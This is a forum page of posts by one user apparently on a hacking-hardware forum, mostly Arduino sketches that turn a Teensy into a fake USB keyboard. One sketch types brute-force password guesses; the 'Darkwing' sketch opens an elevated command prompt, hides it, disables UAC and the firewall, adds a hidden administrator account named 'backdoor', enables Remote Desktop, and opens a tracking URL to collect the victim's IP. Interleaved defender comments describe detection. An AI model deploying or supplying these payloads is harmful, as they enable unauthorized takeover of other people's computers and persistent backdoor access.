
HaDAk

Everything posted by HaDAk

  1. I put the adapter on my teensy: http://twitpic.com/2hdkc4 It works perfectly, out of the box.
  2. I've been working on some code to do some brute forcing, but I can't seem to get it quite right. You're welcome to take a look at it, but if you fix it and get it working properly, I'd really appreciate it coming back to me.

     // Simple Bruteforcer v0.1
     // by HaDAk
     // Special thanks to Kevin B. and Carl V.
     //
     // What this sketch is: a Teensy configured as a USB keyboard (every
     // Keyboard.* call below is the Teensy HID keyboard API). It walks through
     // candidate strings built from printable ASCII (32..126) and types each one,
     // followed by Enter, into whatever has input focus on the host.
     // The post above says the sketch does not yet work as intended.
     //
     // Defender note: the host cannot tell these keystrokes from a person typing.
     // What stops this class of device is on the receiving side: lockout or
     // back-off after a few failed attempts, and USB device-installation
     // restrictions so an unknown HID keyboard is not accepted in the first place.
     // Detection signal: a burst of failed authentications at a fixed cadence
     // right after a new keyboard device is attached.

     // Variables
     int ascii = 32; // 32 - 126
     int digit = 1;
     // NOTE(review): `ascii` and `digit` are not referenced anywhere else in the
     // sketch as posted.
     int blinkcount = 0;
     int MAX_PASSWORD = 32; // size of the candidate buffer in hax()

     // Runs once on power-up: two quick LED blinks, a one-second pause, then the
     // enumeration starts.
     void setup() {
       // Blink when the ducky is first plugged in, to verify power to it.
       while(blinkcount < 2){
         blink(50);
         blinkcount++;
       }
       delay(1000); // wait a second
       hax(128);
     }

     // Nothing is repeated; all work happens in setup().
     void loop() { }

     // Turns the LED on pin D6 on for `time` ms, then off for `time` ms.
     void blink(int time){
       pinMode( PIN_D6, OUTPUT ); // set LED to super bright
       digitalWrite(PIN_D6, HIGH); // LED on
       delay(time); // Slow blink
       digitalWrite(PIN_D6, LOW); // LED off
       delay(time);
     }

     // Sends one Enter key press followed by a release (two HID reports).
     void enter(){
       // Press the enter key, and release it
       Keyboard.set_key1(KEY_ENTER);
       Keyboard.send_now();
       Keyboard.set_key1(0);
       Keyboard.send_now();
     }

     // Enumerates candidates like an odometer: position 0 is incremented after
     // every attempt; when a position passes 126 it is reset to 32 and the next
     // position is incremented (a position that was still '\0' is raised to 32).
     // `n` is forwarded unchanged to try_password().
     void hax(int n){
       char curpw[MAX_PASSWORD];
       for(int i = 0; i < MAX_PASSWORD; ++i) curpw[i] = '\0';
       curpw[0] = 32;
       while(true) {
         try_password(curpw,n);
         curpw[0]++;
         char *test = &curpw[0];
         // Carry loop: runs only while the current position has overflowed.
         while (*test > (char)126) {
           // Stop once the last buffer position has overflowed as well.
           if (curpw[MAX_PASSWORD-1] > (char)126) { return; }
           *test = 32;
           test++;
           (*test)++;
           if (*test < 32) *test = 32;
         }
       }
     }

     // Types curpw[0] .. curpw[n-1] one character at a time, waits 50 ms, then
     // presses Enter.
     // Defender note: the fixed 50 ms gap plus machine-speed typing gives a very
     // regular inter-attempt interval, which is what throttling and lockout
     // policies are designed to defeat.
     void try_password(char* curpw, int n){
       for(int i=0;i<n;i++){
         Keyboard.print(curpw[i]);
       }
       delay(50);
       enter();
     }
  3. You're reinventing the wheel here! My code does the same thing (and more), and does it a bit more elegantly.

     // Darkwing v0.1
     // USB Ducky Framework for the Teensy 2.0
     // by HaDAk
     // for the Hak.5 Community -- please contribute, distribute, and credit!
     //
     // What this sketch is: a Teensy acting as a USB keyboard that opens an
     // elevated command prompt through the Run dialog and types a fixed list of
     // Windows commands into it. Everything it does arrives as ordinary keyboard
     // input, so the controls that matter are host-side: USB device-installation
     // restrictions, standard-user sessions, an elevation prompt that asks for
     // credentials, and monitoring of the registry values and account changes
     // noted next to each payload below.

     // Variables
     int blinkcount = 0;

     // OS X payloads
     // NOTE(review): osx_ips is defined but never typed by the sketch as posted.
     char* osx_ips = "ifconfig";

     // *nix payloads
     // NOTE(review): nix_ips is defined but never typed by the sketch as posted.
     char* nix_ips = "ifconfig";

     // Windows Payloads
     // Add user "backdoor" with password "p@$$w0rd",
     // add to the local admin group, and hide from the login screen
     // Defender note: three independent indicators come out of this one line --
     // local account creation (Security event 4720), a member added to the local
     // Administrators group (Security event 4732), and a new value under
     // Winlogon\SpecialAccounts\UserList. Any value appearing under that key
     // is worth an alert on a managed workstation.
     char* win_adduser = "net user backdoor p@$$w0rd /add && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /V backdoor /T REG_DWORD /F /D \"0\" && net localgroup \"Administrators\" backdoor /ADD";

     // Disable UAC
     // Defender note: writes EnableLUA=0 under Policies\System. The change only
     // takes effect after a restart, so a registry-write alert on this value
     // (for example Sysmon event 13) fires before UAC is actually off.
     char* win_disableuac = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f";

     // Enable Remote Desktop
     // Defender note: writes fDenyTSConnections=0 under Control\Terminal Server.
     // Monitor that value for changes made outside of Group Policy or the
     // management tooling that normally owns it.
     char* win_enablerdp = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f";

     // Disable Windows Firewall
     // Defender note: uses the legacy `netsh firewall` context. Process-creation
     // logging with command lines (Security event 4688 or Sysmon event 1) shows
     // netsh.exe being started from cmd.exe with this argument string.
     char* win_disablefirewall = "netsh firewall set opmode disable";

     // Launch their browser to your favorite website -- I use this to collect their IP and other system metrics
     // Defender note: this is an outbound HTTP request to a fixed hostname, so
     // proxy and DNS logs for that hostname identify every host the device was
     // run on.
     char* win_launchwebsite = "start /min www.hadak.org/pwnd-by-a-ducky";

     // Runs once on power-up: waits for the host to enumerate the device, opens
     // an elevated cmd window, moves it off screen, then types the payload
     // strings in the order shown, each followed by Enter.
     void setup() {
       // Blink when the ducky is first plugged in, to verify power to it.
       while(blinkcount < 2){
         blink(50);
         blinkcount++;
       }
       // Windows generally needs a longer delay to enumerate the device. 3000ms is
       // typically sufficient, depending on the speed of the machine. Additionally,
       // the first time the device is plugged in, Windows will need a while to
       // install drivers. To avoid a really high delay, I recommend unplugging the
       // Ducky, letting Windows install the drivers, then replugging it.
       // The value will probably vary by machine, so experiment to find what works.
       // Defender note: the first-time driver installation described above is
       // itself logged by Windows; a new keyboard device appearing on a machine
       // that already has one is a useful correlation point.
       delay(3000);
       blink(50);
       RunWinUACCommand("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\""); // Vile's better command line: http://www.hak5.org/forums/index.php?showtopic=16505
       //RunGnomeKDECommand("xterm"); // Linux (Gnome/KDE) command line example
       //RunOSXCommand("Terminal.app"); // OS X Command line example
       delay(250);
       // Move window off screen
       win_MoveWindow();
       // Administer payload(s)
       // Defender note: on the host this appears as cmd.exe spawning reg.exe,
       // net.exe and netsh.exe within a few seconds of each other, with no
       // pauses a human typist would produce.
       Keyboard.print(win_disableuac);
       enter();
       Keyboard.print(win_adduser);
       enter();
       Keyboard.print(win_enablerdp);
       enter();
       Keyboard.print(win_disablefirewall);
       enter();
       Keyboard.print(win_launchwebsite);
       enter();
       Keyboard.print("exit");
       enter();
     }

     // After setup() has finished, blink the LED slowly forever.
     void loop() {
       blink(400);
     }

     // Turns the LED on pin D6 on for `time` ms, then off for `time` ms.
     void blink(int time){
       pinMode( PIN_D6, OUTPUT ); // set LED to super bright
       digitalWrite(PIN_D6, HIGH); // LED on
       delay(time); // Slow blink
       digitalWrite(PIN_D6, LOW); // LED off
       delay(time);
     }

     // Sends one Enter key press followed by a release (two HID reports).
     void enter(){
       // Press the enter key, and release it
       Keyboard.set_key1(KEY_ENTER);
       Keyboard.send_now();
       Keyboard.set_key1(0);
       Keyboard.send_now();
     }

     // Sends Alt+F2, waits 500 ms, types `cmd` and presses Enter.
     // Only referenced from a commented-out line in setup().
     void RunGnomeKDECommand(char *cmd){
       Keyboard.set_modifier(MODIFIERKEY_ALT);
       Keyboard.set_key1(KEY_F2);
       Keyboard.send_now();
       Keyboard.set_modifier(0);
       Keyboard.set_key1(0);
       Keyboard.send_now();
       delay(500);
       Keyboard.print(cmd);
       enter();
     }

     // Sends GUI+Space, waits 500 ms, types `cmd`, waits another 500 ms and
     // presses Enter. Only referenced from a commented-out line in setup().
     void RunOSXCommand(char *cmd){
       Keyboard.set_modifier(MODIFIERKEY_GUI);
       Keyboard.set_key1(KEY_SPACE);
       Keyboard.send_now();
       Keyboard.set_modifier(0);
       Keyboard.set_key1(0);
       Keyboard.send_now();
       delay(500);
       Keyboard.print(cmd);
       delay(500);
       enter();
     }

     //void RunWindowsCommand(char *cmd){
     //  Keyboard.set_modifier(MODIFIERKEY_GUI);
     //  Keyboard.set_key1(KEY_R);
     //  Keyboard.send_now();
     //  Keyboard.set_modifier(0);
     //  Keyboard.set_key1(0);
     //  Keyboard.send_now();
     //  delay(500);
     //  Keyboard.print(cmd);
     //  enter();
     //}

     // Sends GUI+R (Run dialog), types `cmd`, then presses Enter while
     // Ctrl+Shift is held, which asks Windows to start the command elevated.
     // After a 500 ms pause it sends further reports and a second Enter --
     // presumably aimed at the elevation prompt (inference; the post does not
     // say).
     // Defender note: a consent prompt that only needs a key press does not
     // stop keyboard-emulating hardware while an administrator is logged in.
     // The UAC policy "Behavior of the elevation prompt for administrators in
     // Admin Approval Mode" set to "Prompt for credentials on the secure
     // desktop", or day-to-day use of a standard account, makes this step
     // require a password the device does not have. Commands typed into the
     // Run dialog are also recorded in the user's RunMRU registry key, which is
     // useful during triage.
     void RunWinUACCommand(char *cmd){
       Keyboard.set_modifier(MODIFIERKEY_GUI);
       Keyboard.set_key1(KEY_R);
       Keyboard.send_now();
       Keyboard.set_modifier(0);
       Keyboard.set_key1(0);
       Keyboard.send_now();
       delay(50);
       Keyboard.print(cmd);
       Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT);
       Keyboard.send_now();
       enter();
       Keyboard.set_modifier(0);
       Keyboard.send_now();
       delay(500);
       Keyboard.set_modifier(KEY_RIGHT);
       Keyboard.send_now();
       Keyboard.set_modifier(0);
       Keyboard.send_now();
       enter();
     }

     // Opens the focused window's system menu with Alt+Space, types "m", sends
     // the Down arrow 250 times and then Enter, which pushes the window towards
     // the bottom of the screen.
     // Defender note: the console window is moved, not closed, so cmd.exe stays
     // visible in the taskbar and in the process list for as long as the
     // payload is running.
     void win_MoveWindow(){
       int move = 0;
       Keyboard.set_modifier(MODIFIERKEY_ALT);
       Keyboard.set_key1(KEY_SPACE);
       Keyboard.send_now();
       Keyboard.set_modifier(0);
       Keyboard.set_key1(0);
       Keyboard.send_now();
       Keyboard.print("m");
       while(move < 250){
         Keyboard.set_key1(KEY_DOWN);
         Keyboard.send_now();
         Keyboard.set_key1(0);
         Keyboard.send_now();
         move++;
       }
       enter();
     }
  4. I'd like to preface this with: I am a complete noob with arduino/teensy, USB, hardware (pinouts/soldering/etc), and programming C/C++. Now, how do we get this: http://store.gravitech.us/micaad.html stuck on the teensy and have the teensy offer it as mass storage, while still sending keystrokes? I'm probably opening a can of worms here, but I'm a total noob. :3